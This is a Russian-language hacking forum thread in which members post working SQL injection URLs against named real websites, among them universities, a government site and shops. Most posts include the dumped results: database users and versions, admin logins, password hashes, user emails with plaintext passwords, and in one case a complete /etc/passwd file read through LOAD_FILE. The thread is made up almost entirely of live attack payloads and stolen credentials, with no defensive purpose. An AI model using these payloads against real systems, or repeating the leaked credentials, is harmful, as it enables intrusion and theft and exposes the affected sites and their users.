SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.musicer.net/Live%20is%20life.php?sms_kod=-60546'/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    6.0.2-alpha-log
    ыыы
     
    _________________________
    1 person likes this.
  2. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11--

    Database Version : 4.1.21-standard
    Database name : sagu_news
    User name : [email protected]


    берем админа:

    Code:
    http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ ws(0x3a, user,password),3,4,5,6,7,8,9,10,11+from+mysql.user--
     
    1 person likes this.
  3. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    www.russiatourism.ru PageRank: 6 тИЦ: 1800
    HTML:
    http://www.russiatourism.ru/?actionType=getCities&D=-1)+union+select+DISTINCT+concat(table_schema,'.',table_name,'=%3E',COLUMN_NAME,'%3Cbr%3E')+from+INFORMATION_SCHEMA.COLUMNS+--+
    
    админку так и не нашел, может ее и нету.

    wap.biz.mts.com.ua

    HTML:
    http://wap.biz.mts.com.ua/tr/rss-feeder?from=/4&pid=1&nid=-38189'+union+select+1,2,3,concat_ws(0x3A,user(),@@version,database()),5,6,7,8+--+
    
    rescue01.gov.by
    HTML:
    http://rescue01.gov.by/news/show.news.cgi?id=-435+union+select+1,2,3,concat_ws(0x3A,user(),database(),version()),5/*
    
    админка на басике авторизации :( .
     
    #7743 AkyHa_MaTaTa, 13 Feb 2009
    Last edited: 13 Feb 2009
    1 person likes this.
  4. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25

    Database Version: 5.0.67-community
    Database name: circlem_db
    User name: circlem_webuser@localhost

    /home/circlem/public_html/manager/obj/database/mysql.php


    : 3 : root : 4c60d3c4867b2f1e6935165b4b68130e24276876 : a : 1 : {s:4:"root";b:1;}





    Database Version: 5.0.67-log
    Database name: janera
    User name: [email protected]



    : Janera:janera : [email protected]
    : Farrah:Farrah : [email protected]
    : Hannah:hannah : [email protected]
    : Tusha:Tusha : [email protected]
    : Erin:Florio : [email protected]
    : Allison DeFrees : Clementine:[email protected]
     
    #7744 spherics, 13 Feb 2009
    Last edited: 13 Feb 2009
    1 person likes this.
  5. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.macbytes.com/mb.php?catdispid=-12+union+select+1,2,3,version(),5,6,7,8,9/*
    5.0.22-log
     
    _________________________
  6. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://www.innernet.org.il/printArticle.php?id=-197+union+select+1,2,3,4,5,6,version()/*

    version() 4.0.16-log
    database() innernet
    user() innerdb@zeraim
     
  7. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

    4.1.21-standard
    engel_website
    engel_website@localhost

    http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(id,0x3a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+engel_users
     
  8. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    PageRank = 7

    Database Version: 5.0.38-Ubuntu_0ubuntu1-log
    Database name: sjudb
    User name: [email protected]



    PageRank = 5

    4.1.22-standard
    dsmayer_dsmayer@localhost
    dsmayer_contemporaryposters


    4.1.20-log
    huntLeaseDefault@localhost
    huntlease



    5.0.67-community
    scientif@localhost
    botany2007
     
  9. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    version:5


    user:[email protected]

    database:drougru
     
    1 person likes this.
  10. Parserian

    Parserian New Member

    Joined:
    19 Jan 2009
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    Code:
    http://www.savatouristik.ru/index.php?id=-1%20UNION%20SELECT%201,%20concat_ws(char(58),%20user(),%20version(),%20database())%20--
    client304@localhost:4.0.27:savatour
     
  11. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    datasvyazi.ru Качественный хостинг=)))

    юзер - superaza_data@localhost
    бд - superaza_data
    версия MySQL - 5.0.44-log

    по все видимости логин админа:superaza , а md5 хеш пароля: a1314764bfdb8b9683dcf378520912a4
     
    1 person likes this.
  12. Parserian

    Parserian New Member

    Joined:
    19 Jan 2009
    Messages:
    15
    Likes Received:
    3
    Reputations:
    0
    Code:
    http://www.i4b.ru/link2.php?id=1%20union%20select%20group_concat(concat_ws(char(58),%20id,pass,nick)%20SEPARATOR%200x3C62723E)%20from%20smerus_users%20limit%201
    
     
    #7752 Parserian, 14 Feb 2009
    Last edited: 14 Feb 2009
  13. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat_ ws(0x3a,version (),database(),user()),4,5,6--
    Database Version : 5.0.51a-log
    Database name : openbg_mambo1
    User name : ropenbg_mambo1@localhost


    берем админов:

    Code:
    http://www.open-bg.net/news.php?id=-1+union+select+1,2,concat _ws(0x3a,flogin,f pass),4,5,6+ from+atuser--
    выводятся все сразу ))

    вот и сама админка :

    Code:
    http://www.open-bg.net/adm /index.php

    -------------------------# add

    Code:
    http://ypetev.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version( ),database(),user()),4,5,6--
    Database Version : 5.0.67-community-log
    Database name : ypetevc_1
    User name : ypetevc_1@localhost
     
    #7753 f1ng3r, 14 Feb 2009
    Last edited: 14 Feb 2009
    1 person likes this.
  14. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    uchri.org - PR7
    Code:
    http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),73),73),4,5,6,7/*
    DB_Ver : 4.1.13-log
    DB_User : root@localhost
    DB : uchri_website

    Выведем пользователей, благо выводятся все и сразу =)
    Code:
    http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),73),73),4,5,6,7+from+mysql.user/*
    root:*3E9CBCAC089CD40647357E4F6468CF7A8FCDC6C5
    bahacal:*EF6AE544D8B7CC6B225A461C0EB6C8E72DF68ED1
    mario:*C0110649C935092BAB4CC0D1897ED4A4680CD3FA
    uchri_user:*D639800883740738B468A3FE6FF4D34EE25FD15E

    Читаем файлы /etc/passwd:
    Code:
    http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(LOAD_FILE(0x2f6574632f706173737764),73),73),4,5,6,7/*
     
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8/*


    Database Version: 4.1.22
    Database name: consensus
    User name: root@localhost


    Read File

    http://www.consensus.ro/shop.php?lang=ro&action=termekek&kat=-24+UNION+SELECT+1,2,3,LOAD_FILE(0x2F6574632F706173737764),5,6,7,8/*
     
    1 person likes this.
  16. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    haas.stanford.edu - PR6
    Code:
    http://haas.stanford.edu/external_fellowships/definition.php?cat_id=10000'+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4/*
    
    DB_Ver : 4.1.22
    DB_User : haas@localhost
    DB : haas
     
  17. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    www.acd.edu
    PR:4
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,user,password),4,5+from+mysql.user/*
    логин/пасс:
    Code:
    root:45b3d67e3384ad28
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+from+mysql.user/*
    версия/юзер/бд:

    Code:
    4.1.22:root@localhost:InternalKnowledgeBase
    смотрим file_priv:
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,file_priv,4,5+from+mysql.user/*
    Y

    Читает etc/passwd
    Code:
    http://www.acd.edu/news.php?id=-1'+union+select+1,2,load_file('/etc/passwd'),4,5+from+mysql.user/*
    Code:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    XXnews:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    XXoperator:x:11:0:operator:/root:/sbin/nologin
    XXgames:x:12:100:games:/usr/games:/sbin/nologin
    XXgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    XXftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/bin/bash
    XXwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
    named:x:25:25:Named:/var/named:/sbin/nologin
    dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
    postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    mwade:x:500:500::/home/mwade:/bin/bash
    rack:x:501:501::/home/rack:/bin/bash
    dzo:x:502:502::/home/dzo:/bin/bash
    psienkiewicz:x:503:503:Piotr Sienkiewicz:/home/psienkiewicz:/bin/bash
    galileoe:x:504:504:Galileo Website:/home/galileoe:/bin/false
    matt:x:505:505:Matt Wade:/home/matt:/sbin/nologin
    lynn:x:506:506:lynn:/home/lynn:/bin/false
    aaron:x:507:507:aaron:/home/galileoe/xdrive/folder/aaron/./:/bin/false
    XXtemp:x:509:509:temp:/home/temp:/bin/sh
    plastus:x:510:510::/home/plastus/:/bin/sh
    xdrive:x:511:511::/home/galileoe/xdrive/:/bin/false
    veeroos:x:512:512::/home/veeroos:/bin/sh
    gallery:x:513:513::/home/gallery:/bin/sh
    Xkamil:x:514:514::/home/kamil:/bin/sh
    presentations:x:516:516::/home/galileoe/xdrive/presentations:/bin/sh
    rpelletier:x:517:517::/home/rpelletier:/bin/bash
    ccarson:x:518:518:Chuck Carson:/home/ccarson:/bin/bash
    wwolfe:x:519:519::/home/wwolfe:/bin/bash
    apache2:x:102:102:Apache2 Owner:/usr/local/httpd-2.2.6:/bin/false
    mysqldev:x:5000:5000:Mysql Dev User:/usr/local/mysql:/sbin/nologin
    oracle:x:110:110:Oracle User:/u01/app/oracle/home:/bin/bash
     
    1 person likes this.
  18. Dimionx

    Dimionx Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    37
    Likes Received:
    12
    Reputations:
    4
    www.rune-soft.com

    PR = 4


    Code:
    http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(login,0x3a,password,0x3a,email),20,21,22,23+from+user+limit+2,1/*
    login:password:email
    admin:tagltorp:[email protected]



    Code:
    http://www.rune-soft.com/product.php?product_id=-102%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(version(),0x3a,database(),0x3a,user()),20,21,22,23/*
    версия:бд:юзер

    5.0.32-Debian_7etch8:runeDB:runeDBuser@localhost
     
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://cms.artmedia.ee/arinou/index.php?leht=149'+union+select+version(),2/*

    Версия: 4.1.22-standard
    Имя бд: wartmed_walmivad
    Юзер: wartmed_wartmed@localhost

    Таблицы не подобрал)

    http://www.tartu.ee/arinouandla/index.php?leht=219'+union+select+version(),2

    Пятая версия.

    В бд ничего нету интересного,можете сами проверить таблицы:

    kasutajad,kasutajad_back,kasutajad_190607,umail
     
    1 person likes this.
  20. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Code:
    http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10--
    Database Version : 5.0.32-Debian_7etch4-log
    Database name : vraca
    User name : [email protected]


    берем юзверей:

    Code:
    http://www.zavraca.com/news.php?topic=11&id=-1+union+select+1,concat _ws(0x3a,username,user_password),3,4,5,6,7,8,9,10+from+phpbb _users+limit+1,1--
    их ~ 1700
     
    1 person likes this.
Thread Status:
Not open for further replies.